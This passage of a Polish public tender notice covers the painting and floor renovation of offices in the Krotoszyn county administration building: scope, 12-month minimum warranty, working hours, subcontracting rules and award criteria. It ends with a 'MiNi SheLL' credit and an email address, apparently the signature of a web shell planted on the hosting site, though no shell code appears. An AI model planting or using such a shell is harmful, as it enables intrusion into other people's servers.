15)	Prace winny odbywać się od poniedziałku do piątku w godzinach:  nie wcześniej niż od 07.00  do 19.00
16)	Zamawiający nie  dopuszcza częściowego odbiór prac oraz częściowego  fakturowania wykonanych prac (dla danego zadania). Podstawę do wystawienia faktury stanowi  pozytywny protokół końcowego odbioru prac (oddzielnie dla każdego zadania), potwierdzony przez upoważnionego przedstawiciela stron.

17)	Wykonawca na potrzeby ochrony powietrza przed zanieczyszczeniem jest zobowiązany do używania środków transportu spełniających odpowiednie normy emisji spalin oraz prowadzenia prac budowlanych w sposób ograniczający niezorganizowaną emisję pyłu do powietrza. Ponadto Wykonawca jest zobowiązany do użytkowania farb i lakierów  ekologicznych o małej zawartości NMLZO (niemetanowe lotne związki organiczne).
2.3.  Istnieje możliwość dokonania wizji lokalnej obiektu po uzgodnieniu telefonicznym -            Kazimierz Serek tel. 62 725-42-56 w. 335

    2.4. Podwykonawstwo
1.)	Zamawiający nie dokonuje zastrzeżenia dotyczącego obowiązku osobistego wykonania kluczowych części zamówienia przez Wykonawcę
2.)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczyła będzie podmiotu, na którego zasoby wykonawca powoływał się , na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu określonych w SIWZ, wykonawca zobowiązany będzie wykazać zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
3.)	Zamawiający we wzorze umowy określił  wymagania dotyczące  umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje  zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu
4.)	 Zamawiający  we wzorze umowy  określił informacje o umowach o podwykonawstwo, których  przedmiotem są dostawy lub usługi, które podlegają obowiązkowi przedkładania zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8, 45.43.21.30-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Wydłużenie gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2
Remont pomieszczeń biurowych  w  budynku Nr 1 Starostwa Powiatowego w Krotoszynie - Wydział Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2
Remont pomieszczeń biurowych  w  budynku Nr 1 Starostwa Powiatowego w Krotoszynie - Wydział Geodezji, Kartografii, Katastru i Gospodarki Nieruchomościami.

1)	Budynki położone są w Krotoszynie przy ul. 56 Pułku Piechoty Wlkp. 8 10, znajdują na terenie historycznego układu urbanistycznego miasta Krotoszyna pod Nr 692/Wlkp./A
2)	Budynki  użytkowane są  obecnie przez Starostwo Powiatowe w Krotoszynie. Stanowią część dawnego kompleksu koszarowego zlokalizowanego przy ul. 56 Pułku Piechoty Wielkopolskiej 8 i 10 w Krotoszynie. Kompleks koszar pochodzi z końca XIX wieku. W okresie międzywojennym koszary były siedzibą 56 Pułku Piechoty. W okresie powojennym stanowiły nadal siedzibę jednostek wojskowych. Budynki   są dwukondygnacyjne, kryte dachem stromym. 
3)	Zadanie 1 
Założono roboty przygotowawcze, zmycie powierzchni przygotowanych do malowania z poszpachlowaniem nierówności, gruntowanie powierzchni, malowanie  powierzchni wewnętrznych ścian i sufitów, malowanie rur, zerwanie wykładziny dywanowej, cyklinowanie  posadzek, lakierowanie posadzek,  wymiana cokołów. Szczegółowy zakres prac zawierają dołączone do niniejszej specyfikacji kosztorysy ofertowe
Zadanie 2
 Założono roboty przygotowawcze, zmycie powierzchni przygotowanych do     malowania z poszpachlowaniem nierówności, gruntowanie powierzchni, malowanie   powierzchni wewnętrznych ścian i  sufitów, malowanie rur. Szczegółowy zakres prac zawierają dołączone do niniejszej specyfikacji kosztorysy ofertowe

4)	Szczegółowy opis przedmiotu zamówienia określają  kosztorysy ofertowe stanowiące Załącznik Nr 1 a i 1 b  do  niniejszej SIWZ

5)	Wykonawca w ramach przedmiotu zamówienia zobowiązany jest  do:
wykonania  wszelkich robót przygotowawczych, porządkowych (zagospodarowania placu budowy, utrzymania zaplecza budowy, uprzątnięcia placu budowy i przywrócenia do stanu zastanego) 
oraz wszelkich innych czynności niezbędnych do prawidłowego wykonania przedmiotu zamówienia i użytkowania przez Zamawiającego.

6)	Wykonawca ponosi pełną odpowiedzialność za ewentualne szkody wyrządzone przez jego   działania lub zaniechania i zobowiązany jest do ich naprawy na własny koszt.

7)	Jeżeli w opisie przedmiotu zmówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie wskazaniu temu towarzyszą wyrazy lub równoważne, co oznacza, że dopuszcza się  rozwiązania nie gorsze niż opisane, spełniające wymagania techniczne, funkcjonalne, eksploatacyjne, jakościowe, co najmniej takie jak wskazane w opisie przedmiotu zamówienia Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, funkcjonalnych, eksploatacyjnych i jakościowych, nie gorszych niż przyjęte w dokumentacji.

8)	Wymagany minimalny okres gwarancji na wykonane roboty (materiały i robociznę) wynosi 12 miesięcy od daty bezusterkowego odbioru końcowego. 
Jednym z kryteriów oceny ofert jest  okres na jaki  Wykonawca wydłuży gwarancję.  Dokładny okres gwarancji określony zostanie po wyborze oferty przedstawiającej najkorzystniejszy bilans kryteriów oceny ofert tj. ceny oraz wydłużenie gwarancji

9)	Wykonanie zamówienia:
a)	 Do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów i urządzeń o najnowszych rozwiązaniach technologicznych gwarantujących odpowiednią jakość wykonania zamówienia.
b)	Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów dokumenty potwierdzające pozwolenie na zastosowanie (atesty, certyfikaty, aprobaty techniczne, świadectwa jakości)

10)	Wykonawca jest odpowiedzialny za prawidłowe metody i jakość wykonanych robót, bezpieczeństwo wszelkich czynności na terenie trwania prac.

11)	Przedmiot zamówienia należy wykonać zgodnie z załączoną dokumentacją, wytycznymi określonymi w SIWZ, z wiedzą, sztuką budowlaną, przepisami BHP, ppoż. oraz poleceniami przedstawiciela ze strony Zamawiającego.

12)	Zabrania się stosowania materiałów nieodpowiadających wymaganiom Polskiej Normy i PN EN oraz o innych parametrach niż określone w projekcie.

13)	Prace  obejmujące realizację przedmiotu zamówienia  winny być prowadzone w sposób jak najmniej uciążliwy dla otoczenia z uwzględnieniem godzin ciszy nocnej.

14)	Wszelkie roboty związane z prawidłowym wykonaniem przedmiotu zamówienia muszą być tak zorganizowane przez Wykonawcę, aby nie utrudniały działalności Starostwa Powiatowego w Krotoszynie.
W związku z  przeprowadzaniem robót na  obiekcie użytkowym, należy zachować szczególną  ostrożność i  zminimalizować uciążliwości związane z przeprowadzanymi pracami. Wykonawca winien zapewnić szczególne bezpieczeństwo  interesantom i  pracownikom Starostwa Powiatowego w Krotoszynie.  
15)	Prace winny odbywać się od poniedziałku do piątku w godzinach:  nie wcześniej niż od 07.00  do 19.00
16)	Zamawiający nie  dopuszcza częściowego odbiór prac oraz częściowego  fakturowania wykonanych prac (dla danego zadania). Podstawę do wystawienia faktury stanowi  pozytywny protokół końcowego odbioru prac (oddzielnie dla każdego zadania), potwierdzony przez upoważnionego przedstawiciela stron.

17)	Wykonawca na potrzeby ochrony powietrza przed zanieczyszczeniem jest zobowiązany do używania środków transportu spełniających odpowiednie normy emisji spalin oraz prowadzenia prac budowlanych w sposób ograniczający niezorganizowaną emisję pyłu do powietrza. Ponadto Wykonawca jest zobowiązany do użytkowania farb i lakierów  ekologicznych o małej zawartości NMLZO (niemetanowe lotne związki organiczne).
2.3.  Istnieje możliwość dokonania wizji lokalnej obiektu po uzgodnieniu telefonicznym -            Kazimierz Serek tel. 62 725-42-56 w. 335

    2.4. Podwykonawstwo
1.)	Zamawiający nie dokonuje zastrzeżenia dotyczącego obowiązku osobistego wykonania kluczowych części zamówienia przez Wykonawcę
2.)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczyła będzie podmiotu, na którego zasoby wykonawca powoływał się , na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu określonych w SIWZ, wykonawca zobowiązany będzie wykazać zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
3.)	Zamawiający we wzorze umowy określił  wymagania dotyczące  umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje  zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu
4.)	 Zamawiający  we wzorze umowy  określił informacje o umowach o podwykonawstwo, których  przedmiotem są dostawy lub usługi, które podlegają obowiązkowi przedkładania zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Wydłużenie gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com